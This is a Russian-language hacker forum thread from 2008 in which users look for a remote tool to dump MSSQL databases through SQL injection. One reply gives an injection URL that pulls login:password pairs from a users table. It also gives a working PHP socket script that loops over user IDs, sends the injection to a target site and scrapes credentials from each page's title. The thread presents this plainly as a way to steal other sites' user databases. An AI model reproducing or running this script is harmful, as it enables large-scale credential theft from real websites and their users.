Mssql уддаленный дамп

Discussion in 'Уязвимости' started by delay(0), 13 Jan 2008.

  1. delay(0)

    delay(0) Member

    Joined:
    22 Nov 2006
    Messages:
    90
    Likes Received:
    41
    Reputations:
    6
    Нужен удаленный дампер mssql.
    Тот, что от Кэша с лимитом. Тот, что от СКЛХАК`а хз как с mssql работает. Поделитесь, у кого есть.
     
  2. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    на
    посмтри
     
  3. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    http://mssql-wa.leprado.com/website/

    полнофункциональный интерфейс, дампера нет
     
  4. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    епта mssql 2003 сервер...
     
  5. delay(0)

    delay(0) Member

    Joined:
    22 Nov 2006
    Messages:
    90
    Likes Received:
    41
    Reputations:
    6
    $n@ke, это релиз от Кэша и есть.
    Красиво, но не то...
    епта, перезалей сорсы своего дампера =\
     
  6. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Епта я его не куда заливал что бы перезаливать.
    Научись формулировать мысли.
    Удаленные дампер через иньекцию.
     
  7. delay(0)

    delay(0) Member

    Joined:
    22 Nov 2006
    Messages:
    90
    Likes Received:
    41
    Reputations:
    6
    Я думаю, кто хотел, тот понял.
     
  8. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Я не понял, блеки тоже мы тупые...
     
  9. delay(0)

    delay(0) Member

    Joined:
    22 Nov 2006
    Messages:
    90
    Likes Received:
    41
    Reputations:
    6
    Тебе сочувствую, а Блеки понял, явно указав, что дампера нет. бгг)
    Деньги - оффтопер =\
     
    2 people like this.
  10. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Как я понял постановку задачи: тебе нужно слить базу какого-то ресурса, используя инъекцию. Тоесть выводится по одному юзеру и нужно постоянно увеличивать значения некого колумна-идентификатора юзера, так ? Например

    http://www.site.com/index.asp?id=1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+ nvarchar)+from+users+where+uID=3)--

    Если я правильно понял задачу (?), то могу поделится своим решением.

    Что нам мешает сделать скрипт на базе сокетов и http протокола вот такого типа

    PHP:
    <?php

        $PORT 
    80;                          // рабочий порт
        
    $ADDR gethostbyname("site.com");   // ресурс, базу которой мы сливаем


        //каждую итерацию цикла мы извлекаем одного юзера

        
    for($n 0;$n 1000;$n++)           
        {

          
    $fp socket_create(AF_INET,SOCK_STREAM,SOL_TCP);         // создаем сокет   
          
    socket_connect($fp,$ADDR,$PORT);                          // конектимся к нужному ресурсу

          //отправляем http- запрос, в котором содержится инъекция


          
    $str1 "GET http://www.site.com/index.asp?id=1+or+1=(SELECT+TOP+1+cast(login+as+nv archar)%2B%27%3A%27%2Bcast(password+as+ nvarchar)+from+users+where+uID=";
          
    $str2 ")-- HTTP/1.0\r\n Host: site.com\r\n\r\n";
         

          
    $str $str1.$n.$str2;                 // значение uID в инъекции соответствует значению параметра цикла $n          

          
    socket_write($fp,$str,strlen($str));   //отправляем слепленную строку  

          
    while($out socket_read($fp,2048))    // читаем ответ сервера - это исходный код html-страницы
          
    {
            

                    
    //Фильтрация полученной страницы - нам нужно извлечь необходимые данные. Для каждого сайта 
                    //будет своя фильтрация
            //Например если нужные нам данные выводятся в заголовок страницы:
                    //      <html>
            //    <title> login;password;email </title>
            //    ...
                    //      </html>

                   
    $s strstr($out,"<title>"); 
                    
    $nm strpos($s,"</title>");
                    
    $result substr($s,7,$nm 7);
                     
            
    //Конец фильтрации


            
    echo $result;    // выводим результат или пишем его в файл
            
          
    }

          
          echo 
    "<br>";          //выводим каждого юзера с новой строки

          
    socket_close($fp);    //завершаем роботу с сокетом 

        
    }// конец for
    ?>

    Думаю принцип понятен - в комментариях все написано. Правда я делал скрипт для сливания баз с сайтов с MySQL инъекцией (вот почему и нужно делать свою фильтрацию для каждого сайта), но его элементарные принципы позволяют работать и с MSSQL.

    Примитивно - зато работает
     
    3 people like this.
  11. NamahS

    NamahS New Member

    Joined:
    26 Jun 2008
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    to cash Ведь ты выкладывал где-то Удаленный дампер через иньекцию...плиз дай ссылку...ПЛИЗ)))
     
  12. xena-mil1

    xena-mil1 Elder - Старейшина

    Joined:
    17 Oct 2006
    Messages:
    13
    Likes Received:
    21
    Reputations:
    0
    :confused: :confused: :confused:
     
    #12 xena-mil1, 7 Jul 2008
    Last edited: 29 Aug 2008
  13. NamahS

    NamahS New Member

    Joined:
    26 Jun 2008
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    to xena-mil1 врядли перспективная...в локалке, частный случай...хотя и в ИНЕТЕ наверно база знаний la2info встречается :)...

    P.S. Так как такими вещами не занимаюсь постоянно(только пытаться начал учиться), то могу гарантировать, что если дашь свой скрипт, то никому больше не дам ;)
    В любом случае за любую помощь буду благодарен)...
    если не трудно глянь ветку _http://forum.antichat.ru/threadnav65041-5-10.html
     
    #13 NamahS, 8 Jul 2008
    Last edited: 8 Jul 2008